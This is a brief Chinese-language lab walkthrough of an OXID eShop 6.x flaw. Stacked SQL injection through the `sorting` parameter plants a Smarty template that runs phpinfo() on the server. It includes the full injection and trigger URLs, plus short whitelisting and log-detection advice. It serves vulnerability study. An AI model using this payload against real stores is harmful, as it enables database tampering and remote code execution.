來源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
實驗地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc&autogo=1
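1. 將PHP代碼寫入數據庫:`sorting` 參數的值未經過濾便進入 SQL 語句,分號之後的 INSERT 以堆疊查詢方式執行,向 oxcontents 表寫入一筆內容記錄。十六進制值解碼後,OXLOADID 為 `vulnspydemo`,OXCONTENT 為 Smarty 模板標籤 `[{if phpinfo()}][{/if}]`(寫入的是模板表達式,而非 PHP 文件)。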
http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23
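2. 觸發PHP代碼:以上一步寫入的 OXLOADID(vulnspydemo)請求內容頁,該記錄的 OXCONTENT 會被當作模板渲染,其中的 `phpinfo()` 因而在服務端執行。防禦上,`sorting` 應只接受白名單內的排序欄位與方向;排查時可檢查日誌中 `sorting` 參數含有 `;` 或 `insert into` 的請求,以及 oxcontents 表中來源不明、內容含模板標籤的記錄。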
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo